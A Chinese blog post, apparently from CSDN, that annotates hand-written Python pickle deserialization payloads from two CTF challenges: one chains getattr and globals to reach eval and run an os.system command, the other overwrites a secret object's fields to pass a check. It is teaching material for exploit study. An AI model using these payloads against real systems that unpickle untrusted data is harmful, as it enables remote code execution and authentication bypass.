python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用

最新推荐文章于 2024-07-03 20:56:40 发布
最新推荐文章于 2024-07-03 20:56:40 发布
阅读量197 收藏
点赞数
文章标签: python pickle反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39743414/article/details/111452353
版权
本文深入探讨Python pickle模块的反序列化漏洞,通过实例解析如何构造反序列化攻击。首先引用了一篇详细的文章,并对手写反序列化部分进行补充。文章介绍了如何利用getattr、globals等内置方法构建payload,实现命令执行。接着分析了一个具体的例子,展示如何覆盖变量以利用漏洞。
摘要由CSDN通过智能技术生成

有一篇很好的文章对此讲的很详细

https://xz.aliyun.com/t/7436#toc-0

此外我对文章中的手写反序列化一块进行一些补充

几道例题Code-Breaking:picklecode

原payload:b'''cbuiltins

getattr

p0

(cbuiltins

dict

S'get'

tRp1

cbuiltins

globals

)Rp2

00g1

(g2

S'builtins'

tRp3

0g0

(g3

S'eval'

tR(S'__import__("os").system("whoami")'

tR.

'''(建议复制到python去看)

首先要声明的一点是反序列化的利用栈是从底端往上的,清楚汇编的同学应该了解这一点

我的注解

b'''白名单REC

cbuiltins #import

getattr  #获取builtins白名单方法getattr

p0  #将getattr压入mem0,字典保存

(cbuiltins    mark元素c模块builtins方法dict压栈

dict

S'get'  声明元素字符串'get'

tRp1

# 创建元组(builtins.dict,'get')调用getattr(dict,get)并将结果压入mem0,保存为1号元素

cbuiltins

globals  #获取builtins属性globals

)Rp2

# 创建一个空元组,调用globals(), 结果压入mem,保存为2号元素

00g1 #去除栈顶两个元素,将mem1号元素压栈,为dict.get

(g2  #mark g2 取出mem中2号元素压栈并mark,为globals()结果

S'builtins' # 定义字符串对象'builtins'

tRp3

# dict.get(globals(),'builtins')并将结果压入mem3空间。(windows这里实测需要__builtins__

0g0 #清栈,载入g0 getattr

(g3  # 载入g3并mark

S'eval'

tR

# getattr(builtins,'eval')结果压栈

(S'__import__("os").system("whoami")'

tR.

# 压入字符串,命令执行

'''高校战疫网络安全分享赛:webtmp

原payload:

b'''c__main__

secret

(S'name'

S"1"

S"category"

S"2"

db0(S"1"

S"2"

i__main__

Animal

.'''

我的注解

b'''变量覆盖题

c__main__  #导入主模块

secret # 主模块的secret

(S'name'

S"1"

S"category"

S"2"

db0

#d 定义了个字典

#b 覆盖掉secret中的同名字段

#0 清栈

(S"1"

S"2"

i__main__

Animal

#调用验证方法,这就是题目中的验证类了,盲猜类使用了__main__.secret做验证

.'''

weixin_39743414
关注
Python pickle 反序列化详解
m0_65129142的博客
12-16 3047
什么是Python反序列化 python反序列化和php反序列化类似(还没接触过java。。),相当于把程序运行时产生的变量,字典,对象实例等变换成字符串形式存储起来,以便后续调用,恢复保存前的状态 python反序列化的库主要有两个,pickle和cPickle,这俩除了运行效率上有区别外,其他没啥区别 pickle的常用方法有 import pickle a_list = [‘a’,‘b’,‘c’] pickle构造出的字符串,有很多个版本。在dumps或loads时,可以用Protocol参数指定协
Python Pickle反序列化漏洞
Lemon's blog
11-15 4682
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1317
一个漏洞
Web安全基础学习:Python反序列化漏洞pickle反序列化
最新发布
qq_51862722的博客
07-03 923
反序列化漏洞是指在反序列化过程中存在潜在安全风险的情况,如果序列化的内容可控,在传递给应用进行反序列化时,可能会导致执行恶意代码或触发其他不受控制的行为。
python使用pickle实现序列化和反序列化
yimaoyingbi的专栏
02-08 301
#使用pickle实现序列和反序列化 import pickle a1 = "中国" a2 = 12345 a3 = [10,20,30,40,50] with open(r"C:\郑宏宇\python_learn\t.txt","wb")as f: pickle.dump(a1,f) pickle.dump(a2,f) pickle.dump(a3,f) with...
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3153
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
详解python pickle中的反序列化漏洞
公众号:该用户快成仙了
06-24 1071
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
python pickle漏洞
weixin_44687621的博客
07-27 621
python反序列化漏洞 1.使用pickle库对对象进行序列化和反序列化操作 json反序列化 import json dict={"admin":"123"} json_info = json.dumps(dict) print(str(type(json_info))+json_info) dict1=json.loads(json_info) print(str(type(dict1))) print(dict) pickle反序列化 import pickle class Test:
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
Pickle序列化的数据格式是Python特有的,不能跨语言使用。 - 序列化:`pickle.dumps()`用于将Python对象转化为二进制数据,可以写入文件: ```python import pickle def sayhi(name): print("hello", name) info...
Python Pickle 实现在同一个文件中序列化多个对象
09-18
Python编程语言中,Pickle模块是一个强大的工具,它允许我们序列化和反序列化Python对象结构。也就是说,它能够将复杂的数据结构或对象状态保存到磁盘文件中,并且之后可以从文件中恢复这些状态。在本篇文章中,...
Python使用pickle进行序列化和反序列化的示例代码
09-24
主要介绍了Python使用pickle进行序列化和反序列化,帮助大家更好的理解和使用pythonpickle库,感兴趣的朋友可以了解下
【WEB安全】不安全的反序列化
weixin_43025534的博客
05-23 1540
序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。**序列化是指将对象或数据结构转换为字节流的过程。**在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其他系统。序列化后的字节流可以被保存下来,以后可以通过反序列化操作重新构建对象并恢复其状态和数据。**反序列化是指将序列化后的字节流转换回对象或数据结构的过程。
pickle反序列化漏洞基础知识与绕过简析
yj520400的博客
03-25 1116
的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.
关于Pickle反序列化总结
桃雾雨Rain的博客
01-18 1942
1.Pickle反序列化 (1)pickle.dump(obj,file[,protocol]) 序列化对象,并将结果数据流写入到文件对象中,protocol可选择模式,默认为0,文本形式序列化,还可以是1或2,二进制形式序列化。 注:pickle.dumps()将对象obj对象序列化并返回一个byte对象 (2)pickle.load(file) 反序列化对象。注意要让python找到类的定义,否则报错。 注:pickle.loads(),从字节对象中读取被封装的对象 简单示例:...
反序列化攻击详细解释
Ba1_Ma0的博客
04-28 5814
简介 详细的记录学习过程中的笔记,可以加我qq一起交流:3316735898 什么是序列化与反序列化 举一个例子,当你在玩游戏时,你正在操作的角色看起来如下 但反序列化后看起来就像这样 Vincent = { "type": "player" "health": 100, "position":{ "x": 31337, "y":13.37, "z":4444 } } 这些只是一个充满值的对象,但当你关闭游戏时,这些值存储在电脑的RAM上,然后就永远消失了 如果想要把这些东西保存下来,ob
python pickle反序列化漏洞_【反序列化Python反序列化pickle
weixin_39626211的博客
12-08 213
0x01 前言前两天在安全客中看了一篇python对象注入的文章,感觉写的很好,就学习一下,在此记录一下。0x02 Pythonpickle在研究python反序列化漏洞之前,我们需要了解本次研究的主体:pickle模块这里主要需要知道4个方法:dump()dumps()load()loads()pickle.dump(obj, file, [protocol])dump()会将对象序列化后写入...
python 自定义模块加密_Python EncryptedPickle包_程序模块 - PyPI - Python中文网
weixin_42402188的博客
12-29 345
fromencryptedpickleimportencryptedpickle# You can use different passphrases for signature and encryptionsignature_passphrases={0:'change me! change me! change me! change me!''change me! change me! cha...
python 加密与解密
weixin_48839391的博客
05-08 3280
加密算法分散列算法、对称加密、非对称加密
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。然后可以将这个字符串反序列化为原来的对象。这个过程中,如果不对反序列化的输入进行充分验证和过滤,攻击者可以构造恶意的pickle字符串,从而在反序列化的过程中执行任意代码。 在BUUCTF中,有一个题目叫做"Pickle Store",该题目利用pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串进行base64解码,并使用pickle模块的loads函数进行反序列化操作。这样就可以触发恶意代码的执行。 为了说明这个例子,作者提供了一个脚本来解析这个pickle字符串,首先使用base64解码得到原始字符串,然后使用pickle模块的loads函数进行反序列化操作,并最终执行恶意代码。这个例子展示了如何利用pickle模块的反序列化功能来执行任意代码。 在pickle模块中,还有一些其他的相关函数和方法可以帮助我们理解和分析pickle字符串的结构和内容。例如,pickletools模块提供了dis函数来反汇编pickle字符串,以及optimize函数来优化和简化pickle字符串的内容。 总结来说,BUUCTF中的Pickle反序列化漏洞利用pickle模块的反序列化功能来执行任意代码的漏洞攻击者通过构造恶意的pickle字符串,可以在反序列化的过程中执行任意代码。为了解析和分析pickle字符串,可以使用pickle模块提供的函数和方法,如loads、pickletools.dis和pickletools.optimize。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值